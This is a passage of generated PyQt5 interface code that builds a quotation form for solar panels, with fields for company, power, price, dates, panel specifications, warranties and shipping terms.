40))\n font = QtGui.QFont()\n font.setPointSize(13)\n self.w.buttonBack.setFont(font)\n self.w.buttonBack.setText('')\n self.w.buttonBack.setObjectName('buttonBack')\n self.w.horizontalLayout_3.addWidget(self.w.buttonBack)\n self.w.labelTitle = QtWidgets.QLabel(self.w.centralWidget)\n font = QtGui.QFont()\n font.setPointSize(25)\n self.w.labelTitle.setFont(font)\n self.w.labelTitle.setAlignment(QtCore.Qt.AlignCenter)\n self.w.labelTitle.setObjectName('labelTitle')\n self.w.horizontalLayout_3.addWidget(self.w.labelTitle)\n spacerItem = QtWidgets.QSpacerItem(50, 40, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_3.addItem(spacerItem)\n self.w.verticalLayout.addLayout(self.w.horizontalLayout_3)\n self.w.scrollArea = QtWidgets.QScrollArea(self.w.centralWidget)\n self.w.scrollArea.setWidgetResizable(True)\n self.w.scrollArea.setObjectName('scrollArea')\n self.w.scrollAreaWidgetContents = QtWidgets.QWidget()\n self.w.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 1178, 751))\n self.w.scrollAreaWidgetContents.setObjectName('scrollAreaWidgetContents')\n self.w.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.w.scrollAreaWidgetContents)\n self.w.horizontalLayout_7.setSpacing(50)\n self.w.horizontalLayout_7.setObjectName('horizontalLayout_7')\n spacerItem1 = QtWidgets.QSpacerItem(29, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem1)\n self.w.verticalLayout_2 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_2.setObjectName('verticalLayout_2')\n self.w.groupGeneral = QtWidgets.QGroupBox(self.w.scrollAreaWidgetContents)\n self.w.groupGeneral.setMinimumSize(QtCore.QSize(250, 0))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setBold(True)\n self.w.groupGeneral.setFont(font)\n self.w.groupGeneral.setAlignment(QtCore.Qt.AlignCenter)\n self.w.groupGeneral.setObjectName('groupGeneral')\n self.w.verticalLayout_3 = QtWidgets.QVBoxLayout(self.w.groupGeneral)\n self.w.verticalLayout_3.setSpacing(20)\n self.w.verticalLayout_3.setObjectName('verticalLayout_3')\n self.w.verticalLayout_12 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_12.setSpacing(2)\n self.w.verticalLayout_12.setObjectName('verticalLayout_12')\n self.w.labelCompany = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelCompany.setFont(font)\n 
self.w.labelCompany.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelCompany.setObjectName('labelCompany')\n self.w.verticalLayout_12.addWidget(self.w.labelCompany)\n self.w.horizontalLayout_6 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_6.setObjectName('horizontalLayout_6')\n self.w.comboCompany = SearchCombo(self.w.groupGeneral)\n self.w.comboCompany.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboCompany.setFont(font)\n self.w.comboCompany.setObjectName('comboCompany')\n self.w.horizontalLayout_6.addWidget(self.w.comboCompany)\n self.w.buttonAddCompany = QtWidgets.QPushButton(self.w.groupGeneral)\n self.w.buttonAddCompany.setMinimumSize(QtCore.QSize(30, 30))\n self.w.buttonAddCompany.setMaximumSize(QtCore.QSize(30, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.buttonAddCompany.setFont(font)\n self.w.buttonAddCompany.setText('')\n self.w.buttonAddCompany.setObjectName('buttonAddCompany')\n self.w.horizontalLayout_6.addWidget(self.w.buttonAddCompany)\n self.w.verticalLayout_12.addLayout(self.w.horizontalLayout_6)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_12)\n self.w.verticalLayout_28 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_28.setSpacing(2)\n self.w.verticalLayout_28.setObjectName('verticalLayout_28')\n self.w.labelMark = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelMark.setFont(font)\n self.w.labelMark.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelMark.setObjectName('labelMark')\n self.w.verticalLayout_28.addWidget(self.w.labelMark)\n self.w.comboMark = SearchCombo(self.w.groupGeneral)\n self.w.comboMark.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboMark.setFont(font)\n self.w.comboMark.setObjectName('comboMark')\n self.w.verticalLayout_28.addWidget(self.w.comboMark)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_28)\n self.w.verticalLayout_13 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_13.setSpacing(2)\n self.w.verticalLayout_13.setObjectName('verticalLayout_13')\n self.w.labelTotalPower = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelTotalPower.setFont(font)\n self.w.labelTotalPower.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelTotalPower.setObjectName('labelTotalPower')\n self.w.verticalLayout_13.addWidget(self.w.labelTotalPower)\n self.w.spinTotalPower = NoWheelDoubleSpinBox(self.w.groupGeneral)\n self.w.spinTotalPower.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinTotalPower.setFont(font)\n self.w.spinTotalPower.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinTotalPower.setDecimals(3)\n self.w.spinTotalPower.setMaximum(9999999999.0)\n self.w.spinTotalPower.setObjectName('spinTotalPower')\n self.w.verticalLayout_13.addWidget(self.w.spinTotalPower)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_13)\n self.w.verticalLayout_14 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_14.setSpacing(2)\n self.w.verticalLayout_14.setObjectName('verticalLayout_14')\n self.w.labelPrice = 
QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelPrice.setFont(font)\n self.w.labelPrice.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelPrice.setObjectName('labelPrice')\n self.w.verticalLayout_14.addWidget(self.w.labelPrice)\n self.w.spinPrice = NoWheelDoubleSpinBox(self.w.groupGeneral)\n self.w.spinPrice.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinPrice.setFont(font)\n self.w.spinPrice.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinPrice.setDecimals(4)\n self.w.spinPrice.setMaximum(9999999999.0)\n self.w.spinPrice.setObjectName('spinPrice')\n self.w.verticalLayout_14.addWidget(self.w.spinPrice)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_14)\n self.w.verticalLayout_15 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_15.setSpacing(2)\n self.w.verticalLayout_15.setObjectName('verticalLayout_15')\n self.w.labelDateQuotation = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelDateQuotation.setFont(font)\n self.w.labelDateQuotation.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelDateQuotation.setObjectName('labelDateQuotation')\n self.w.verticalLayout_15.addWidget(self.w.labelDateQuotation)\n self.w.dateQuotation = NoWheelDateEdit(self.w.groupGeneral)\n self.w.dateQuotation.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.dateQuotation.setFont(font)\n self.w.dateQuotation.setCalendarPopup(True)\n self.w.dateQuotation.setObjectName('dateQuotation')\n self.w.verticalLayout_15.addWidget(self.w.dateQuotation)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_15)\n self.w.verticalLayout_16 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_16.setSpacing(2)\n self.w.verticalLayout_16.setObjectName('verticalLayout_16')\n self.w.labelDateValidity = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelDateValidity.setFont(font)\n self.w.labelDateValidity.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelDateValidity.setObjectName('labelDateValidity')\n self.w.verticalLayout_16.addWidget(self.w.labelDateValidity)\n self.w.dateValidity = NoWheelDateEdit(self.w.groupGeneral)\n self.w.dateValidity.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.dateValidity.setFont(font)\n self.w.dateValidity.setCalendarPopup(True)\n self.w.dateValidity.setObjectName('dateValidity')\n self.w.verticalLayout_16.addWidget(self.w.dateValidity)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_16)\n self.w.verticalLayout_27 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_27.setSpacing(2)\n self.w.verticalLayout_27.setObjectName('verticalLayout_27')\n self.w.labelNContacts = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelNContacts.setFont(font)\n self.w.labelNContacts.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelNContacts.setObjectName('labelNContacts')\n 
self.w.verticalLayout_27.addWidget(self.w.labelNContacts)\n self.w.spinNContacts = NoWheelSpinBox(self.w.groupGeneral)\n self.w.spinNContacts.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinNContacts.setFont(font)\n self.w.spinNContacts.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinNContacts.setMaximum(9999)\n self.w.spinNContacts.setProperty('value', 1)\n self.w.spinNContacts.setObjectName('spinNContacts')\n self.w.verticalLayout_27.addWidget(self.w.spinNContacts)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_27)\n self.w.verticalLayout_17 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_17.setSpacing(2)\n self.w.verticalLayout_17.setObjectName('verticalLayout_17')\n self.w.labelUser = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelUser.setFont(font)\n self.w.labelUser.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelUser.setObjectName('labelUser')\n self.w.verticalLayout_17.addWidget(self.w.labelUser)\n self.w.comboUser = SearchCombo(self.w.groupGeneral)\n self.w.comboUser.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboUser.setFont(font)\n self.w.comboUser.setObjectName('comboUser')\n self.w.verticalLayout_17.addWidget(self.w.comboUser)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_17)\n self.w.verticalLayout_18 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_18.setSpacing(2)\n self.w.verticalLayout_18.setObjectName('verticalLayout_18')\n self.w.labelObservations = QtWidgets.QLabel(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelObservations.setFont(font)\n self.w.labelObservations.setObjectName('labelObservations')\n self.w.verticalLayout_18.addWidget(self.w.labelObservations)\n self.w.textObservations = QtWidgets.QTextEdit(self.w.groupGeneral)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.textObservations.setFont(font)\n self.w.textObservations.setObjectName('textObservations')\n self.w.verticalLayout_18.addWidget(self.w.textObservations)\n self.w.verticalLayout_3.addLayout(self.w.verticalLayout_18)\n self.w.verticalLayout_2.addWidget(self.w.groupGeneral)\n self.w.horizontalLayout_7.addLayout(self.w.verticalLayout_2)\n spacerItem2 = QtWidgets.QSpacerItem(50, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem2)\n self.w.verticalLayout_4 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_4.setObjectName('verticalLayout_4')\n self.w.groupPanel = QtWidgets.QGroupBox(self.w.scrollAreaWidgetContents)\n self.w.groupPanel.setMinimumSize(QtCore.QSize(250, 0))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setBold(True)\n self.w.groupPanel.setFont(font)\n self.w.groupPanel.setAlignment(QtCore.Qt.AlignCenter)\n self.w.groupPanel.setObjectName('groupPanel')\n self.w.verticalLayout_6 = QtWidgets.QVBoxLayout(self.w.groupPanel)\n self.w.verticalLayout_6.setSpacing(20)\n self.w.verticalLayout_6.setObjectName('verticalLayout_6')\n self.w.verticalLayout_19 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_19.setSpacing(2)\n self.w.verticalLayout_19.setObjectName('verticalLayout_19')\n self.w.labelPanelType = QtWidgets.QLabel(self.w.groupPanel)\n font = 
QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelPanelType.setFont(font)\n self.w.labelPanelType.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelPanelType.setObjectName('labelPanelType')\n self.w.verticalLayout_19.addWidget(self.w.labelPanelType)\n self.w.comboPanelType = SearchCombo(self.w.groupPanel)\n self.w.comboPanelType.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboPanelType.setFont(font)\n self.w.comboPanelType.setObjectName('comboPanelType')\n self.w.verticalLayout_19.addWidget(self.w.comboPanelType)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_19)\n self.w.verticalLayout_20 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_20.setSpacing(2)\n self.w.verticalLayout_20.setObjectName('verticalLayout_20')\n self.w.labelCells = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelCells.setFont(font)\n self.w.labelCells.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelCells.setObjectName('labelCells')\n self.w.verticalLayout_20.addWidget(self.w.labelCells)\n self.w.comboCells = SearchCombo(self.w.groupPanel)\n self.w.comboCells.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboCells.setFont(font)\n self.w.comboCells.setObjectName('comboCells')\n self.w.verticalLayout_20.addWidget(self.w.comboCells)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_20)\n self.w.verticalLayout_21 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_21.setSpacing(2)\n self.w.verticalLayout_21.setObjectName('verticalLayout_21')\n self.w.labelPanelPower = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelPanelPower.setFont(font)\n self.w.labelPanelPower.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelPanelPower.setObjectName('labelPanelPower')\n self.w.verticalLayout_21.addWidget(self.w.labelPanelPower)\n self.w.spinPanelPower = NoWheelSpinBox(self.w.groupPanel)\n self.w.spinPanelPower.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinPanelPower.setFont(font)\n self.w.spinPanelPower.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinPanelPower.setMaximum(999999999)\n self.w.spinPanelPower.setObjectName('spinPanelPower')\n self.w.verticalLayout_21.addWidget(self.w.spinPanelPower)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_21)\n self.w.verticalLayout_29 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_29.setSpacing(2)\n self.w.verticalLayout_29.setObjectName('verticalLayout_29')\n self.w.labelEfficiency = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelEfficiency.setFont(font)\n self.w.labelEfficiency.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelEfficiency.setObjectName('labelEfficiency')\n self.w.verticalLayout_29.addWidget(self.w.labelEfficiency)\n self.w.spinEfficiency = NoWheelDoubleSpinBox(self.w.groupPanel)\n self.w.spinEfficiency.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n 
font.setBold(False)\n self.w.spinEfficiency.setFont(font)\n self.w.spinEfficiency.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinEfficiency.setDecimals(2)\n self.w.spinEfficiency.setMaximum(100.0)\n self.w.spinEfficiency.setObjectName('spinEfficiency')\n self.w.verticalLayout_29.addWidget(self.w.spinEfficiency)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_29)\n self.w.verticalLayout_30 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_30.setSpacing(2)\n self.w.verticalLayout_30.setObjectName('verticalLayout_30')\n self.w.groupTolerance = QtWidgets.QGroupBox(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.groupTolerance.setFont(font)\n self.w.groupTolerance.setObjectName('groupTolerance')\n self.w.verticalLayout_8 = QtWidgets.QVBoxLayout(self.w.groupTolerance)\n self.w.verticalLayout_8.setObjectName('verticalLayout_8')\n self.w.horizontalLayout_8 = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout_8.setObjectName('horizontalLayout_8')\n self.w.radioPositiveTolerance = QtWidgets.QRadioButton(self.w.groupTolerance)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.radioPositiveTolerance.setFont(font)\n self.w.radioPositiveTolerance.setChecked(True)\n self.w.radioPositiveTolerance.setObjectName('radioPositiveTolerance')\n self.w.buttonGroup = QtWidgets.QButtonGroup(self.w.centralWidget)\n self.w.buttonGroup.setObjectName('buttonGroup')\n self.w.buttonGroup.addButton(self.w.radioPositiveTolerance)\n self.w.horizontalLayout_8.addWidget(self.w.radioPositiveTolerance)\n self.w.radioNegativeTolerance = QtWidgets.QRadioButton(self.w.groupTolerance)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.radioNegativeTolerance.setFont(font)\n self.w.radioNegativeTolerance.setObjectName('radioNegativeTolerance')\n self.w.buttonGroup.addButton(self.w.radioNegativeTolerance)\n self.w.horizontalLayout_8.addWidget(self.w.radioNegativeTolerance)\n self.w.verticalLayout_8.addLayout(self.w.horizontalLayout_8)\n self.w.verticalLayout_30.addWidget(self.w.groupTolerance)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_30)\n self.w.verticalLayout_32 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_32.setSpacing(2)\n self.w.verticalLayout_32.setObjectName('verticalLayout_32')\n self.w.labelWarrantyProduct = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelWarrantyProduct.setFont(font)\n self.w.labelWarrantyProduct.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelWarrantyProduct.setObjectName('labelWarrantyProduct')\n self.w.verticalLayout_32.addWidget(self.w.labelWarrantyProduct)\n self.w.spinWarrantyProduct = NoWheelSpinBox(self.w.groupPanel)\n self.w.spinWarrantyProduct.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinWarrantyProduct.setFont(font)\n self.w.spinWarrantyProduct.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinWarrantyProduct.setMaximum(9999)\n self.w.spinWarrantyProduct.setObjectName('spinWarrantyProduct')\n self.w.verticalLayout_32.addWidget(self.w.spinWarrantyProduct)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_32)\n self.w.verticalLayout_33 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_33.setSpacing(2)\n 
self.w.verticalLayout_33.setObjectName('verticalLayout_33')\n self.w.labelWarrantyPerformance = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelWarrantyPerformance.setFont(font)\n self.w.labelWarrantyPerformance.setAlignment(\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelWarrantyPerformance.setObjectName('labelWarrantyPerformance')\n self.w.verticalLayout_33.addWidget(self.w.labelWarrantyPerformance)\n self.w.spinWarrantyPerformance = NoWheelSpinBox(self.w.groupPanel)\n self.w.spinWarrantyPerformance.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.w.spinWarrantyPerformance.setFont(font)\n self.w.spinWarrantyPerformance.setFocusPolicy(QtCore.Qt.StrongFocus)\n self.w.spinWarrantyPerformance.setMaximum(9999)\n self.w.spinWarrantyPerformance.setObjectName('spinWarrantyPerformance')\n self.w.verticalLayout_33.addWidget(self.w.spinWarrantyPerformance)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_33)\n self.w.verticalLayout_22 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_22.setSpacing(2)\n self.w.verticalLayout_22.setObjectName('verticalLayout_22')\n self.w.labelCertificates = QtWidgets.QLabel(self.w.groupPanel)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelCertificates.setFont(font)\n self.w.labelCertificates.setObjectName('labelCertificates')\n self.w.verticalLayout_22.addWidget(self.w.labelCertificates)\n self.w.buttonCertificates = CheckableMenuButton(self.w.groupPanel)\n self.w.buttonCertificates.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.buttonCertificates.setFont(font)\n self.w.buttonCertificates.setText('')\n self.w.buttonCertificates.setObjectName('buttonCertificates')\n self.w.verticalLayout_22.addWidget(self.w.buttonCertificates)\n self.w.verticalLayout_6.addLayout(self.w.verticalLayout_22)\n self.w.verticalLayout_4.addWidget(self.w.groupPanel)\n spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n self.w.verticalLayout_4.addItem(spacerItem3)\n self.w.horizontalLayout_7.addLayout(self.w.verticalLayout_4)\n spacerItem4 = QtWidgets.QSpacerItem(50, 50, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout_7.addItem(spacerItem4)\n self.w.verticalLayout_11 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_11.setObjectName('verticalLayout_11')\n self.w.horizontalLayout = QtWidgets.QHBoxLayout()\n self.w.horizontalLayout.setObjectName('horizontalLayout')\n spacerItem5 = QtWidgets.QSpacerItem(50, 0, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.w.horizontalLayout.addItem(spacerItem5)\n self.w.verticalLayout_5 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_5.setObjectName('verticalLayout_5')\n self.w.groupGeographical = QtWidgets.QGroupBox(self.w.scrollAreaWidgetContents)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.w.groupGeographical.sizePolicy().hasHeightForWidth())\n self.w.groupGeographical.setSizePolicy(sizePolicy)\n self.w.groupGeographical.setMinimumSize(QtCore.QSize(250, 0))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n 
font.setBold(True)\n self.w.groupGeographical.setFont(font)\n self.w.groupGeographical.setAlignment(QtCore.Qt.AlignCenter)\n self.w.groupGeographical.setObjectName('groupGeographical')\n self.w.verticalLayout_7 = QtWidgets.QVBoxLayout(self.w.groupGeographical)\n self.w.verticalLayout_7.setSpacing(20)\n self.w.verticalLayout_7.setObjectName('verticalLayout_7')\n self.w.verticalLayout_23 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_23.setSpacing(2)\n self.w.verticalLayout_23.setObjectName('verticalLayout_23')\n self.w.labelIncoterm = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelIncoterm.setFont(font)\n self.w.labelIncoterm.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelIncoterm.setObjectName('labelIncoterm')\n self.w.verticalLayout_23.addWidget(self.w.labelIncoterm)\n self.w.comboIncoterm = SearchCombo(self.w.groupGeographical)\n self.w.comboIncoterm.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboIncoterm.setFont(font)\n self.w.comboIncoterm.setObjectName('comboIncoterm')\n self.w.verticalLayout_23.addWidget(self.w.comboIncoterm)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_23)\n self.w.verticalLayout_24 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_24.setSpacing(2)\n self.w.verticalLayout_24.setObjectName('verticalLayout_24')\n self.w.labelMadeIn = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelMadeIn.setFont(font)\n self.w.labelMadeIn.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelMadeIn.setObjectName('labelMadeIn')\n self.w.verticalLayout_24.addWidget(self.w.labelMadeIn)\n self.w.comboMadeIn = SearchCombo(self.w.groupGeographical)\n self.w.comboMadeIn.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboMadeIn.setFont(font)\n self.w.comboMadeIn.setObjectName('comboMadeIn')\n self.w.verticalLayout_24.addWidget(self.w.comboMadeIn)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_24)\n self.w.verticalLayout_25 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_25.setSpacing(2)\n self.w.verticalLayout_25.setObjectName('verticalLayout_25')\n self.w.labelOrigin = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.w.labelOrigin.setFont(font)\n self.w.labelOrigin.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)\n self.w.labelOrigin.setObjectName('labelOrigin')\n self.w.verticalLayout_25.addWidget(self.w.labelOrigin)\n self.w.comboOrigin = SearchCombo(self.w.groupGeographical)\n self.w.comboOrigin.setMinimumSize(QtCore.QSize(0, 30))\n font = QtGui.QFont()\n font.setWeight(50)\n font.setBold(False)\n self.w.comboOrigin.setFont(font)\n self.w.comboOrigin.setObjectName('comboOrigin')\n self.w.verticalLayout_25.addWidget(self.w.comboOrigin)\n self.w.verticalLayout_7.addLayout(self.w.verticalLayout_25)\n self.w.verticalLayout_26 = QtWidgets.QVBoxLayout()\n self.w.verticalLayout_26.setSpacing(2)\n self.w.verticalLayout_26.setObjectName('verticalLayout_26')\n self.w.labelDestination = QtWidgets.QLabel(self.w.groupGeographical)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n 
